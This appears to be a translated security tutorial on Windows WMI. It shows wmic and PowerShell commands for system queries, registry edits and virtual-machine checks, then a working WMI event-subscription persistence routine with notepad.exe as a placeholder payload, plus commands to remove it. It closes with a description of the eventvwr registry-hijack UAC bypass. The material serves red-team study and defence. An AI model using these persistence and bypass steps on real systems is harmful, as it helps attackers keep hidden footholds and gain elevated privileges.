WMI Registry | WMI Persistence using wmic.exe

What is WMI?

WMI is the Microsoft implementation of Web-Based Enterprise Management (WBEM), with some enhancements in the initial version of it, WBEM is a  industry initiative to develop a standard technology for accessing management information in an enterprise environment that covers not only Windows but also many other types of devices like routers, switches, storage arrays …etc. WMI uses the Common Information Model (CIM) industry standard to represent systems, applications, networks, devices, and other managed components. CIM is developed and maintained by the Distributed Management Task Force (DMTF).

All of that sounds pretty but when Microsoft developed the first versions of WMI they use DCOM (Distributed Component Object Model) wish if a proprietary  Microsoft Technology, so the standards and cross compatibility just took a back seat at the time, on more recent versions of the operating system with Windows Management Framework 2.0 and above MS started to include more and more of the standards and shifter to using WS-Management SOAP-based protocol thru their WinRM (Windows Remote Management) protocol.

We can look at WMI as a collection of objects that provide access to different parts of the operating system, just like with PowerShell objects we have properties, methods and events for each. Each of these objects are defined by what is called MOF  (Manage Object Format) files that are saved in %windir%\System32\wbem with the extension of .mof. The MOF files get loaded by what is called a Provider, when the Provider is registered he loads the definitions of the objects in to the current WMI Namespace. The Namespace can be seen a file system structure that organizes the objects on function, inside of each namespace the objects are just like in PowerShell in what is called Class Instances and each of this is populated with the OS and Application information as the system runs so we always have the latest information in this classes.

Namespaces are organize in a hierarchical way where \root is the top level for all other namespaces. The default namespace where most of the other namespaces and classes are located is root\CIMv2 on Windows Kernel 6.x on Kernel 5.x it is Default\CIMv2. Some are installed by default and others are only available when specific applications are installed.
In summary each Namespace contains Classes, these have:

• Methods Actions that can be taken.
• Properties Information that can be retrieved.
• Instances Instances of the class objects (services, Processes, Disks) each instance with Methods and Properties.
• Events are actions that WMI can monitor for and take action when they happen.

Collection data

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem

wmic /NAMESPACE:"\root\CIMV2" PATH Win32_OperatingSystem

Note:

Echo content formats are not aligned, you need to add parameters to specify the output format

According to powershell echoed branch display, you need to add the following parameters:

wmic /NAMESPACE:"\root\CIMV2" PATH Win32_OperatingSystem GET /all /FORMAT:list

So, other calls by powershell wmi query methods are available wmic achieve, for example:

powershell command:

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem

correspond

wmic /NAMESPACE:"\root\CIMV2" PATH Win32_ComputerSystem GET /all /FORMAT:list

The output method to file:

wmic /OUTPUT:c:\test.txt /NAMESPACE:"\root\CIMV2" PATH Win32_ComputerSystem GET /all /FORMAT:list

 Registry Operations

powershell code is as follows:

Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv

Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles

Get-ItemProperty Sys

Wmic complete code is as follows:

Enum subkey

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call EnumKey ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles"

Note:

Method execution successful Does not mean that will be able to get the right returns the result to note here to fill in the correct parameters, shown in Figure 2-6, deliberately left out, “still prompt Method execution successful, but returns the result of an error

The key enumeration values specified:

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call EnumValues ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles\Sys"

Acquires character string data of a specified value:

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call GetStringValue ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles\Sys","TasksDir"

Create a child:

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call CreateKey ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles\test"

Note:

Note permission issues here need administrator rights

String Value a named value:

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call SetStringValue ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles\test","Data","Name"

Note: If a named value does not exist, then the new; if present, was modified

Delete subkey:

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call DeleteKey ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles\test"

To delete a named set value:

wmic /NAMESPACE:"\root\DEFAULT" path stdregprov call DeleteValue ^&H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\RenameFiles\test","Name"

Note:

The above parameters are described with reference to self https://msdn.microsoft.com/en-us/library/aa393664(VS.85).aspx

Special characters ^&H80000002 have the following meanings:

&H80000000 ‘HKEY_CLASSES_ROOT

&H80000001 ‘HKEY_CURRENT_USER

&H80000002 ‘HKEY_LOCAL_MACHINE

&H80000003 ‘HKEY_USERS

&H80000005 ‘HKEY_CURRENT_CONFIG

Virtual Machine Detection

View TotalPhysicalMemory and NumberOfLogicalProcessors

wmic /NAMESPACE:"\root\CIMV2" PATH Win32_ComputerSystem GET NumberOfLogicalProcessors,TotalPhysicalMemory /FORMAT:list

View the current process

wmic /NAMESPACE:"\root\CIMV2" PATH Win32_Process GET Caption /FORMAT:list

WMI Persistence

Powershell complete codes are as follows:

$filterName = ‘BotFilter82’
$consumerName = ‘BotConsumer23’
$exePath = ‘C:\Windows\System32\notepad.exe’
$Query = “SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ‘Win32_PerfFormattedData_PerfOS_System'”
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace “root\subscription” -Arguments @{Name=$filterName;EventNameSpace=”root\cimv2″;QueryLanguage=”WQL”;Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace “root\subscription” -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace “root\subscription” -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

The next steps through the corresponding process called wmic

Create an __EventFilter instance

wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

Create an __EventConsumer instance

wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"

Create a __FilterToConsumerBinding instance

wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""

List the __EventFilter and __EventConsumer instances

Filters：

wmic /NAMESPACE:"\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list

Event Consumers：

wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list

Event Bindings：

wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list

By viewing under powershell code:

Filters：

Get-WMIObject -Namespace root\Subscription -Class __EventFilter

Event Consumers：

Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

Event Bindings：

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

Remove all instances

Filters：

wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="BotFilter82" DELETE

Event Consumers：

wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="BotConsumer23" DELETE

Event Bindings：

wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='BotFilter82'" DELETE

Note:

Binding in the determination wmic Filter parameter “BotFilter82” in “to become ‘

Clear through powershell implementation code:

Filters：

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

Event Consumers：

Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

Event Bindings：

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

Fileless uac bypass using eventvwr exe and registry hijacking

Wmic part of the operation requires administrator privileges, and add here a newly acquired skills UACbypass

fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking

Reference:

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

Author:

Matt Nelson @enigma0x3

principle

When eventvwr.exe process starts, first looks for the registry position HKCU\Software\Classes\mscfile\shell\open\command, if there is empty, then look for registry location HKCR\mscfile\shell\open\command (where the default value %SystemRoot%\system32\mmc.exe "%1" %*), with high permission to start mmc.exe, and finally open eventvwr.msc.

Next, if the registry HKCU\Software\Classes\mscfile\shell\open\command added payload, you can execute a preset payload before you start mmc.exe

The most important thing:

Modify the registry HKCU\Software\Classes\mscfile\shell\open\command key values needed only normal user can privileges.

Reference

http://www.exploit-monday.com/2016/08/wmi-persistence-using-wmic.html